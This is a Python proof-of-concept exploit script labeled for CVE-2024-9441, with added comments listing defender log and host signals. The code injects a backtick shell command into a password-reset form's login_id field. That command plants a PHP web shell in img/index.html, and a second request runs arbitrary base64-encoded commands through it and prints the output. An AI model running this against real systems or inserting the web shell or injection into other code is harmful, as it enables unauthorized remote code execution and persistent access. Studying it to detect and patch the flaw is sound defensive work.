Poc-CVE-2024-9441.py
import requests
import base64
import sys
import logging
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Flat proof-of-concept script; the file name labels it as a PoC for CVE-2024-9441.
# It sends two HTTP POST requests: one to a password-reset endpoint with a
# shell command substitution in the `login_id` field, and one to the file that
# command is meant to create. The listing has lost its indentation; the code
# lines are kept exactly as they appear.
#
# Defender notes (derived only from the requests visible below):
#   - Log/WAF signal: POST to /index.php?c=user&m=forgot_password whose
#     `login_id` value contains backticks or other shell metacharacters.
#   - Host signal: img/index.html under the web root containing PHP code, and
#     later POSTs to /img/index.html carrying a base64 value in parameter `c`.
#   - The underlying flaw is that `login_id` reaches a shell unsanitised;
#     follow the vendor guidance for the CVE and keep the web interface off
#     untrusted networks.

# Silences urllib3's certificate warning, since both requests use verify=False.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
logging.basicConfig(level=logging.INFO)
# Exactly one command-line argument is required; otherwise print usage and exit 1.
if len(sys.argv) != 2:
print("Usage: python exploit.py <command>")
sys.exit(1)
# Placeholder base URL; it must be edited by hand before the script does anything.
target = "https://yourIP:port"
url = target + "/index.php?c=user&m=forgot_password"
# Form body for the first request. The backtick-wrapped value is a shell
# command substitution that echoes a PHP snippet into img/index.html; that
# snippet base64-decodes POST parameter "c", passes it to exec() and prints
# the collected output lines.
PAYLOAD = {
'login_id': '`echo \'<?php exec(base64_decode($_POST["c"]),$output);echo(implode("\n",$output));?>\' > img/index.html`'}
try:
# verify=False disables TLS certificate validation, so the peer is not authenticated.
req = requests.post(url, data=PAYLOAD, verify=False, timeout=10)
# NOTE(review): HTTP 200 only shows that the endpoint answered; it does not by
# itself confirm that the file was written, so the log line below can be a
# false positive. When triaging, check the host for img/index.html instead.
if req.status_code == 200:
logging.info("Payload injected successfully.")
# The command-line argument is base64-encoded and sent as POST parameter "c".
cmd = sys.argv[1].encode('utf-8')
enc_cmd = base64.b64encode(cmd).decode('utf-8')
PAYLOAD_CMD = {'c': enc_cmd}
req_cmd = requests.post(target + "/img/index.html", data=PAYLOAD_CMD, verify=False, timeout=10)
if req_cmd.status_code == 200:
# The response body is printed verbatim.
print(req_cmd.text)
else:
logging.error(f"Exploit failed with status code: {req_cmd.status_code}")
else:
logging.error(f"Initial payload injection failed with status code: {req.status_code}")
# Both requests use a 10-second timeout; a timeout is logged separately from
# other requests errors, and neither is re-raised.
except requests.exceptions.Timeout:
logging.error("Request timed out.")
except requests.exceptions.RequestException as e:
logging.error(f"An error occurred: {e}")